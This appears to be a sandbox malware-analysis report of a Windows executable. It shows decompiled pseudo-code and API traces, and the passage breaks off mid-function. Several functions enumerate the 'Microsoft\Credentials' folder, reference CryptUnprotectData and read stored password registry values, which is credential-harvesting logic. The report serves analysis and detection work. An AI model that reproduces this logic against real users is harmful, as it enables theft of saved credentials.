                                • Opcode ID: 403ab780173edf7ca256d8a46e4ae22afbf76247b98eaff03a4cae4f07767835
                                • Instruction ID: d3b8bc427d879abbe067d139e4d8751d61c0b56586969d320d8ec49f77c75a5b
                                • Opcode Fuzzy Hash: 403ab780173edf7ca256d8a46e4ae22afbf76247b98eaff03a4cae4f07767835
                                • Instruction Fuzzy Hash: 0A01DF36200109BFFB105FA29D84AEBBBACEB44784B04003AFF12D05A0D779DC81822D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 2878877b4fb96dd6387d393cb3696d7bef76af751c319c337b16d2b81faded20
                                • Instruction ID: 5397eece0a1688dd905253f83ef07836dc4e260be7ec153caf65aeba5f13d1a3
                                • Opcode Fuzzy Hash: 2878877b4fb96dd6387d393cb3696d7bef76af751c319c337b16d2b81faded20
                                • Instruction Fuzzy Hash: 82E04674308210269A24AF3BFE49AC723AC5B54725794852FF808D33A2CE2CCCC0802C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??2@
                                • String ID:
                                • API String ID: 1033339047-0
                                • Opcode ID: a4fa1e677cc50a3193f21f28cfe2e500cc07678549d552243c94e4c074398bac
                                • Instruction ID: 62cae8e83bd5d1efe0b7207de595a3d8a96caeb03304a295a8faf49e2a024305
                                • Opcode Fuzzy Hash: a4fa1e677cc50a3193f21f28cfe2e500cc07678549d552243c94e4c074398bac
                                • Instruction Fuzzy Hash: 58F04FB96012005EFB589F36ED4679576F0A708309F18C53EE9058B2F4EB7444448F1D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0040D935(intOrPtr* _a4) {
                                				long _v8;
                                				long _v12;
                                				char _v273;
                                				void _v275;
                                				char _v276;
                                				void* _t21;
                                				void* _t22;
                                
                                				_v8 = 0;
                                				_v276 = 0;
                                				memset( &_v275, 0, 0x104);
                                				GetWindowsDirectoryA( &_v276, 0x104);
                                				_v273 = 0;
                                				GetVolumeInformationA( &_v276, 0, 0,  &_v8,  &_v12, 0, 0, 0); // executed
                                				_t21 = E0040D794(_a4, 0x80000002, _v8); // executed
                                				if(_t21 != 0) {
                                					_t22 = E0040D794(_a4, 0x80000001, _v8); // executed
                                					return _t22;
                                				}
                                				return _t21;
                                			}











                                APIs
                                • memset.MSVCRT ref: 0040D959
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040D969
                                • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0040D989
                                  • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D7DC
                                  • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(00000008), ref: 0040D925
                                  • Part of subcall function 0040D794: RegQueryValueExA.ADVAPI32(?,MainLocation,00000000,?,?,?), ref: 0040D82B
                                  • Part of subcall function 0040D794: atoi.MSVCRT ref: 0040D840
                                  • Part of subcall function 0040D794: memset.MSVCRT ref: 0040D869
                                  • Part of subcall function 0040D794: _mbscpy.MSVCRT ref: 0040D8B3
                                  • Part of subcall function 0040D794: _mbscpy.MSVCRT ref: 0040D8C6
                                  • Part of subcall function 0040D794: RegCloseKey.ADVAPI32(?), ref: 0040D8FC
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$Close_mbscpy$DirectoryInformationQueryValueVolumeWindowsatoi
                                • String ID:
                                • API String ID: 2578913611-0
                                • Opcode ID: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
                                • Instruction ID: 16f147aac1a6c23bf629e3733d081773eeb3eb261c5fc0fbd4ac26dcbb8d373b
                                • Opcode Fuzzy Hash: 5ad718d0a178176aa5508ab2a21a3f8c1d31e3488d15dce6a5d9606b6b3f0dca
                                • Instruction Fuzzy Hash: BB01ECB2C0011CFFDB11DAD4DD85EDEBBACAB08348F1444BAB609E2051D6744F989BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E00406982(signed int* __eax, void* __edx, void** __edi, signed int _a4, intOrPtr _a8) {
                                				void* _t8;
                                				void* _t13;
                                				signed int _t16;
                                				void** _t21;
                                				signed int _t22;
                                
                                				_t21 = __edi;
                                				_t22 =  *__eax;
                                				if(__edx < _t22) {
                                					return 0;
                                				} else {
                                					_t13 =  *__edi;
                                					do {
                                						 *__eax =  *__eax + _a8;
                                						_t16 =  *__eax;
                                					} while (__edx >= _t16);
                                					_t8 = malloc(_t16 * _a4); // executed
                                					 *__edi = _t8;
                                					if(_t22 > 0) {
                                						if(_t8 != 0) {
                                							memcpy(_t8, _t13, _t22 * _a4);
                                						}
                                						0x413de6(_t13);
                                					}
                                					return 0 |  *_t21 != 0x00000000;
                                				}
                                			}









                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@mallocmemcpy
                                • String ID:
                                • API String ID: 3831604043-0
                                • Opcode ID: 43d69199a7eee8632861a0ca226f395938b4ef25a2d6add8601f3af2fa4d9b08
                                • Instruction ID: 3aa6f9377dfc5db36287fc2124ba6b3299db699d57604e2b41df5078e12f24d2
                                • Opcode Fuzzy Hash: 43d69199a7eee8632861a0ca226f395938b4ef25a2d6add8601f3af2fa4d9b08
                                • Instruction Fuzzy Hash: 22F02EF26082119FC7089F75B94149BB79DAF45324B12443FF405D3285D738DC64C7A8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00406B06: GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20
                                • _mbscpy.MSVCRT ref: 004103C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Version_mbscpy
                                • String ID: CryptUnprotectData
                                • API String ID: 1856898028-1975210251
                                • Opcode ID: b937d2dc300c7c2f46df72a81b3b85809e99c29df1e88dcb10a6db808fd69e02
                                • Instruction ID: 124ef79401bdf720cf005998ce1259a6424ffa61298b62e05562ee11dac58942
                                • Opcode Fuzzy Hash: b937d2dc300c7c2f46df72a81b3b85809e99c29df1e88dcb10a6db808fd69e02
                                • Instruction Fuzzy Hash: D0F0A471A0030C9BCF04EBA9D589ADEBBB85F08318F11802FE910B6181D7B8D4C4CB2E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00406AE0() {
                                				struct tagLOGFONTA _v64;
                                				struct HFONT__* _t6;
                                
                                				E00406A19( &_v64, "Arial", 0xe, 0);
                                				_t6 = CreateFontIndirectA( &_v64); // executed
                                				return _t6;
                                			}






                                APIs
                                  • Part of subcall function 00406A19: memset.MSVCRT ref: 00406A23
                                  • Part of subcall function 00406A19: _mbscpy.MSVCRT ref: 00406A63
                                • CreateFontIndirectA.GDI32(?), ref: 00406AFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: CreateFontIndirect_mbscpymemset
                                • String ID: Arial
                                • API String ID: 3853255127-493054409
                                • Opcode ID: 40c99e9d60d1ab3f835d0cb059d53835698da9c32ee7eac16eefe87b5741b715
                                • Instruction ID: e76317b4d314f44c8759e74956d0c4c6c36286f6473dc8017c9c1f452a7d8835
                                • Opcode Fuzzy Hash: 40c99e9d60d1ab3f835d0cb059d53835698da9c32ee7eac16eefe87b5741b715
                                • Instruction Fuzzy Hash: 25D0C970E4020C66D600B7A0FD07BC9776C5B40708F504025BA01B50E1EAE4E1188AD9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 82%
                                			E0040C5A4(void* __edi, void* __eflags) {
                                				void* __esi;
                                				signed int _t20;
                                				intOrPtr _t27;
                                				intOrPtr _t34;
                                				void* _t38;
                                				void* _t41;
                                				void* _t45;
                                				void* _t47;
                                				intOrPtr _t48;
                                
                                				_t45 = __edi;
                                				_t34 = 0;
                                				E00403CB2( *((intOrPtr*)(__edi + 0x390)), __eflags, 0, 0);
                                				_t20 =  *((intOrPtr*)(__edi + 0x398));
                                				 *((intOrPtr*)(__edi + 0x108)) = 0;
                                				if( *((intOrPtr*)(_t20 + 0x30)) <= 0) {
                                					_t47 = 0x417c88;
                                				} else {
                                					if( *((intOrPtr*)(_t20 + 0x1c)) <= 0) {
                                						_t41 = 0;
                                						__eflags = 0;
                                					} else {
                                						_t41 =  *((intOrPtr*)( *((intOrPtr*)(_t20 + 0xc)))) +  *((intOrPtr*)(_t20 + 0x10));
                                					}
                                					_t47 = _t41;
                                				}
                                				0x413dce("/stext", _t47);
                                				if(_t20 != 0) {
                                					_t48 = E0040C50E(_t20, _t47);
                                					__eflags = _t48 - _t34;
                                					if(_t48 <= _t34) {
                                						goto L15;
                                					}
                                					goto L9;
                                				} else {
                                					_t48 = 1;
                                					L9:
                                					E0040BBF0(_t45, _t34); // executed
                                					E0040B2F5(_t45);
                                					_t27 =  *((intOrPtr*)(_t45 + 0x398));
                                					if( *((intOrPtr*)(_t27 + 0x30)) <= 1) {
                                						_t38 = 0x417c88;
                                					} else {
                                						_t55 =  *((intOrPtr*)(_t27 + 0x1c)) - 1;
                                						if( *((intOrPtr*)(_t27 + 0x1c)) <= 1) {
                                							_t38 = 0;
                                						} else {
                                							_t38 =  *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xc)) + 4)) +  *((intOrPtr*)(_t27 + 0x10));
                                						}
                                					}
                                					 *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x390)) + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)(_t45 + 0x38c)) + 0x730));
                                					E0040A8F2( *((intOrPtr*)(_t45 + 0x390)),  *((intOrPtr*)(_t45 + 0x390)), _t45, _t55, _t38, _t48); // executed
                                					_t34 = 1;
                                					E0040BDCF(_t45);
                                					L15:
                                					return _t34;
                                				}
                                			}













                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _strcmpi
                                • String ID: /stext
                                • API String ID: 1439213657-3817206916
                                • Opcode ID: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
                                • Instruction ID: 4d1f9c46abbdb5e83ce0205fdf3861872a59254e2367a1e2376026c6f9217911
                                • Opcode Fuzzy Hash: 8485200a8f39a627e5aa607aa4fe0e6a3330f2b4b352017cc2d2cebf071a6028
                                • Instruction Fuzzy Hash: D721A130614211EFC36C9F2988C1966B3A9BF05314B1556BFB40AA7382DB79EC519BC8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 86%
                                			E004042AA(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                				char _v328;
                                				char _v652;
                                				char _v928;
                                				signed char _v972;
                                				char _v1296;
                                				signed int _v1300;
                                				void* __esi;
                                				void* _t33;
                                				char* _t34;
                                				void* _t38;
                                				void* _t41;
                                				intOrPtr _t44;
                                				void* _t45;
                                
                                				_v1300 = _v1300 | 0xffffffff;
                                				_v1296 = 0;
                                				_v328 = 0;
                                				_v652 = 0;
                                				_t38 = __ecx;
                                				_t41 = 0;
                                				E0040783B( &_v1300, __eflags, _a4);
                                				if(E00407898( &_v1300) == 0) {
                                					L11:
                                					E00407930( &_v1300);
                                					return _t41;
                                				} else {
                                					_t44 = _a8;
                                					do {
                                						if((_v972 & 0x00000010) != 0) {
                                							__eflags = E00407800( &_v1300);
                                							if(__eflags != 0) {
                                								E004042AA(_t38, __eflags,  &_v652, _t44 + 1);
                                							}
                                							goto L10;
                                						}
                                						if(E00406B3B() != 0) {
                                							L6:
                                							_t33 = E00404220(_t51, _t38,  &_v652); // executed
                                							if(_t33 != 0) {
                                								_t41 = 1;
                                							}
                                							goto L10;
                                						}
                                						if(_t44 < 1) {
                                							goto L10;
                                						}
                                						_t34 =  &_v928;
                                						0x413d92(_t34, "credentials", 0xb);
                                						_t45 = _t45 + 0xc;
                                						_t51 = _t34;
                                						if(_t34 != 0) {
                                							goto L10;
                                						}
                                						goto L6;
                                						L10:
                                					} while (E00407898( &_v1300) != 0);
                                					goto L11;
                                				}
                                			}

















                                APIs
                                  • Part of subcall function 0040783B: strlen.MSVCRT ref: 00407862
                                  • Part of subcall function 0040783B: strlen.MSVCRT ref: 0040786F
                                  • Part of subcall function 00407898: FindFirstFileA.KERNELBASE(00000103,00000247,?,?,004042EE,?), ref: 004078AE
                                  • Part of subcall function 00407898: strlen.MSVCRT ref: 004078FC
                                  • Part of subcall function 00407898: strlen.MSVCRT ref: 00407904
                                • _strnicmp.MSVCRT ref: 0040431A
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: strlen$FileFindFirst_strnicmp
                                • String ID: credentials
                                • API String ID: 773473087-4194641934
                                • Opcode ID: 5f078394bf2af8fae6ee7cd525e99526c652b3bab6a7d26c0a39e7232aba890c
                                • Instruction ID: 0f17e4e4efe03dbe37520bfce116898ea2601fe450b4b80a5694618c7f7ee9f5
                                • Opcode Fuzzy Hash: 5f078394bf2af8fae6ee7cd525e99526c652b3bab6a7d26c0a39e7232aba890c
                                • Instruction Fuzzy Hash: 4E21D872A0421C56DB60F6668C417DB77A85F81349F4460FBAE18F21C2EA78DF84CF55
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 0040E695
                                  • Part of subcall function 0040F9A0: CompareFileTime.KERNEL32(?,?,00000000,?,?,00000000), ref: 0040F9F1
                                • strrchr.MSVCRT ref: 0040E6B1
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: CompareFileTimememsetstrrchr
                                • String ID:
                                • API String ID: 4226234548-0
                                • Opcode ID: 2a82436f4faa6b05b2cc636fc97259d9a3810c45e056b17ce4a1fb11b0906514
                                • Instruction ID: 53b6c61b59caaa2062b149ee1151cefa66ffad82665aa7653a439d89524e8348
                                • Opcode Fuzzy Hash: 2a82436f4faa6b05b2cc636fc97259d9a3810c45e056b17ce4a1fb11b0906514
                                • Instruction Fuzzy Hash: F611BAB1C0522C9EDB21EF5A9C85AC9BBB8BB09304F9040FF9248F2241D7785B94CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 75%
                                			E00404380(intOrPtr _a4, intOrPtr _a8) {
                                				void _v267;
                                				char _v268;
                                				void* __edi;
                                				void* __esi;
                                				int _t13;
                                				int _t17;
                                
                                				_t17 = 0;
                                				_v268 = 0;
                                				memset( &_v267, 0, 0x104);
                                				_t16 =  &_v268;
                                				0x41223f(); // executed
                                				_t21 = _a8;
                                				if(_a8 != 0) {
                                					E0040680E( &_v268);
                                					E00406EFE(_t16, "Microsoft\Credentials");
                                					_t13 = E004042AA(_a4, _t21, _t16, 0); // executed
                                					_t17 = _t13;
                                				}
                                				return _t17;
                                			}










                                APIs
                                • memset.MSVCRT ref: 004043A1
                                  • Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279
                                  • Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
                                  • Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826
                                  • Part of subcall function 00406EFE: strlen.MSVCRT ref: 00406F00
                                  • Part of subcall function 00406EFE: strlen.MSVCRT ref: 00406F0B
                                  • Part of subcall function 00406EFE: _mbscat.MSVCRT ref: 00406F22
                                  • Part of subcall function 004042AA: _strnicmp.MSVCRT ref: 0040431A
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: strlen$_mbscat$FolderPathSpecial_strnicmpmemset
                                • String ID: Microsoft\Credentials
                                • API String ID: 3139367858-3148402405
                                • Opcode ID: b9bc567b91fdf7fc349dfc15b94f9d4a96cdfacf2bcfcbc0785656f82b29690e
                                • Instruction ID: 677ab761eff5409f3287a779563a9fbc28491fd5395d1aa5cc811df03cb69dee
                                • Opcode Fuzzy Hash: b9bc567b91fdf7fc349dfc15b94f9d4a96cdfacf2bcfcbc0785656f82b29690e
                                • Instruction Fuzzy Hash: 8CF0E97260411427D660B66AEC06FCF775C8F90754F00006AF988F71C1D9F8AA95C3E5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411EDB
                                • GetPrivateProfileStringA.KERNEL32(?,?,?,?,?,?), ref: 00411EF0
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: PrivateProfileString$Write
                                • String ID:
                                • API String ID: 2948465352-0
                                • Opcode ID: abc632a6b8702d949c7b4aeb5ee99501477ff23bfd6640d1747d5c6edfc6b77e
                                • Instruction ID: d9e70508a7a1dcd4d44e453fce3bd4c14a214bdae5f42dce9164bd63fbf12eb7
                                • Opcode Fuzzy Hash: abc632a6b8702d949c7b4aeb5ee99501477ff23bfd6640d1747d5c6edfc6b77e
                                • Instruction Fuzzy Hash: A7E0E53600020DFBCF018FE0DC44EEA3F79EB48344F04C425BA0989021C776C6A6EBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 50%
                                			E00408490(intOrPtr _a4, int _a8, wchar_t* _a12) {
                                				void* _v8;
                                				char _v12;
                                				void* _v35;
                                				int _v36;
                                				int _v250;
                                				char _v252;
                                				void _v291;
                                				int _v292;
                                				void* __ebx;
                                				void* __esi;
                                				intOrPtr* _t37;
                                				void* _t38;
                                				int _t39;
                                				intOrPtr* _t42;
                                				void* _t43;
                                				void* _t44;
                                				intOrPtr* _t47;
                                				void* _t48;
                                				int _t57;
                                				void* _t64;
                                				void* _t66;
                                				intOrPtr _t67;
                                				intOrPtr _t70;
                                				int* _t71;
                                				struct HINSTANCE__** _t74;
                                				intOrPtr* _t75;
                                				void* _t76;
                                
                                				_t74 = _a4 + 0x78;
                                				E00404D18(_t74);
                                				_t37 =  *((intOrPtr*)(_t74 + 0xc));
                                				_t57 = 0;
                                				if(_t37 == 0) {
                                					_t38 = 0;
                                				} else {
                                					_t38 =  *_t37(_a8, 0x8004, 0, 0,  &_v8); // executed
                                				}
                                				if(_t38 != _t57) {
                                					_t39 = wcslen(_a12);
                                					_t7 = _t39 + 2; // 0x2
                                					_t66 = _t39 + _t7;
                                					_a8 = _v8;
                                					E00404D18(_t74);
                                					_t42 =  *((intOrPtr*)(_t74 + 0x14));
                                					if(_t42 == _t57) {
                                						_t43 = 0;
                                					} else {
                                						_t43 =  *_t42(_a8, _a12, _t66, _t57);
                                					}
                                					if(_t43 == _t57) {
                                						L15:
                                						_t67 = _v8;
                                						_t44 = E00404D18(_t74);
                                						_t75 =  *((intOrPtr*)(_t74 + 0x18));
                                						if(_t75 != _t57) {
                                							_t44 =  *_t75(_t67);
                                						}
                                						return _t44;
                                					} else {
                                						_v36 = _t57;
                                						asm("stosd");
                                						asm("stosd");
                                						asm("stosd");
                                						asm("stosd");
                                						asm("stosd");
                                						_t70 = _v8;
                                						_v12 = 0x14;
                                						E00404D18(_t74);
                                						_t47 =  *((intOrPtr*)(_t74 + 0x10));
                                						if(_t47 == _t57) {
                                							_t48 = 0;
                                						} else {
                                							_t48 =  *_t47(_t70, 2,  &_v36,  &_v12, _t57);
                                						}
                                						if(_t48 != _t57) {
                                							_v292 = _t57;
                                							memset( &_v291, _t57, 0xff);
                                							_a8 = _t57;
                                							_t64 = 0;
                                							_t71 =  &_v292;
                                							do {
                                								_a8 = _a8 + ( *(_t76 + _t64 - 0x20) & 0x000000ff);
                                								E004081DA(_t71,  *(_t76 + _t64 - 0x20) & 0x000000ff);
                                								_t64 = _t64 + 1;
                                								_t71 = _t71 + 2;
                                							} while (_t64 < 0x14);
                                							E004081DA( &_v252, _a8);
                                							_v250 = _t57;
                                							E004083D0(_a4,  &_v292, _a12);
                                							_t57 = 0;
                                						}
                                						goto L15;
                                					}
                                				}
                                				return _t38;
                                			}































                                APIs
                                  • Part of subcall function 00404D18: LoadLibraryA.KERNEL32(advapi32.dll,?,004084A6), ref: 00404D23
                                  • Part of subcall function 00404D18: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404D37
                                  • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00404D43
                                  • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00404D4F
                                  • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00404D5B
                                  • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00404D67
                                  • Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00404D73
                                • wcslen.MSVCRT ref: 004084CF
                                • memset.MSVCRT ref: 0040854D
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$LibraryLoadmemsetwcslen
                                • String ID:
                                • API String ID: 1960736289-0
                                • Opcode ID: f78174ecb424998fb22a5f41f112440964ae667a2303fb3ee1b26447fe91a2a4
                                • Instruction ID: 2dd004568a6c17cef409d44c463746fb2ce178d2970b6d5fdfdea9e5a7127ffe
                                • Opcode Fuzzy Hash: f78174ecb424998fb22a5f41f112440964ae667a2303fb3ee1b26447fe91a2a4
                                • Instruction Fuzzy Hash: D931A331500159BFCB11DFA4CD819EF77A8AF88304F14447EF985B7181DA38AE599B68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 72%
                                			E0040D9B9(intOrPtr* __esi) {
                                				intOrPtr _v8;
                                				int _v16;
                                				int _v20;
                                				char _v276;
                                				char _v532;
                                				void _v1555;
                                				char _v1556;
                                				void _v2579;
                                				char _v2580;
                                				void* __ebx;
                                				void* __edi;
                                				char* _t26;
                                
                                				_v8 = 1;
                                				_v1556 = 0;
                                				memset( &_v1555, 0, 0x3ff);
                                				_v2580 = 0;
                                				memset( &_v2579, 0, 0x3ff);
                                				_t26 =  &_v1556;
                                				0x413735(_t26,  &_v2580); // executed
                                				if(_t26 != 0) {
                                					_v532 = 0;
                                					_v276 = 0;
                                					_v20 = 0;
                                					_v16 = 0;
                                					E00406958(0xff,  &_v532,  &_v1556);
                                					E00406958(0xff,  &_v276,  &_v2580);
                                					_push( &_v532);
                                					_v16 = 4;
                                					_v20 = 7;
                                					_v8 =  *((intOrPtr*)( *__esi))();
                                				}
                                				return _v8;
                                 			}

                                APIs
                                • memset.MSVCRT ref: 0040D9E1
                                • memset.MSVCRT ref: 0040D9F8
                                  • Part of subcall function 00413735: memset.MSVCRT ref: 00413757
                                  • Part of subcall function 00413735: RegCloseKey.ADVAPI32(?,?,?,?,000003FF,?,00000000), ref: 004137BF
                                  • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                  • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$Closememcpystrlen
                                • String ID:
                                • API String ID: 1317463181-0
                                • Opcode ID: 36fe1095114160a690701a78f195309e8067f9881caaff21558cd16a9a1fec4e
                                • Instruction ID: 9f1eb3389bb6404362c4a1eb730a31a0c8d2a7d5337f5270765416232cb6ce98
                                • Opcode Fuzzy Hash: 36fe1095114160a690701a78f195309e8067f9881caaff21558cd16a9a1fec4e
                                • Instruction Fuzzy Hash: 74113DB2D0025CAEDB11DF98DC45BDEBBBCAB55304F0404EAA529B3241D7B45F888F65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040FA34: memset.MSVCRT ref: 0040FA77
                                  • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA8E
                                  • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA97
                                  • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAF0
                                  • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAFE
                                  • Part of subcall function 00406D2B: GetFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040F9E7,00000000,?,00000000,?,?,00000000), ref: 00406D46
                                  • Part of subcall function 00406D2B: CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00406D4F
                                • CompareFileTime.KERNEL32(?,?,00000000,?,?,00000000), ref: 0040F9F1
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: strlen$FileTime$CloseCompareHandlememset
                                • String ID:
                                • API String ID: 3621460190-0
                                • Opcode ID: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
                                • Instruction ID: df050e5846938951bd5ef1dd521a076978c5ac7e099cd3a6f0bbe67f44093ab2
                                • Opcode Fuzzy Hash: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
                                • Instruction Fuzzy Hash: 5C114FB2E00109ABDB15EFE9D9415EEBBB9AF44304F20407BE906F3281D6389E45CB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: QueryValue
                                • String ID:
                                • API String ID: 3660427363-0
                                • Opcode ID: 37570f48f22fb23ef0d3df0d3c669cd07964a3a6542881bee3074b52f4b94034
                                • Instruction ID: a80749d54e4db297dbe5ce684396449be2bdfe43891eac82306683b5e99974c7
                                • Opcode Fuzzy Hash: 37570f48f22fb23ef0d3df0d3c669cd07964a3a6542881bee3074b52f4b94034
                                • Instruction Fuzzy Hash: 21E0B675504208FADB01CB90DC41EEE7BBCEB44644F1041AAB90596151E672AB449B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00411D5E
                                  • Part of subcall function 00411C43: memset.MSVCRT ref: 00411C61
                                  • Part of subcall function 00411C43: _itoa.MSVCRT ref: 00411C78
                                  • Part of subcall function 00411C43: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 00411C87
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: PrivateProfile$StringWrite_itoamemset
                                • String ID:
                                • API String ID: 4165544737-0
                                • Opcode ID: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
                                • Instruction ID: 191c8e33efa92f5acf0b5800ded4dbdf6d41edfd47def5b2a3195e96d71d9d98
                                • Opcode Fuzzy Hash: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
                                • Instruction Fuzzy Hash: 28E0B632004609EBCF125F90EC05AE93F76FF44315F548459FA5C04530D33295B0AF84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00406ED6(void* __ecx, intOrPtr* __esi, void* _a4, void* _a8, long _a12) {
                                				long _v8;
                                				int _t9;
                                
                                				_v8 = _v8 & 0x00000000;
                                				_t9 = ReadFile(_a4, _a8, _a12,  &_v8, 0); // executed
                                				if(__esi != 0) {
                                					 *((intOrPtr*)(__esi)) = _v8;
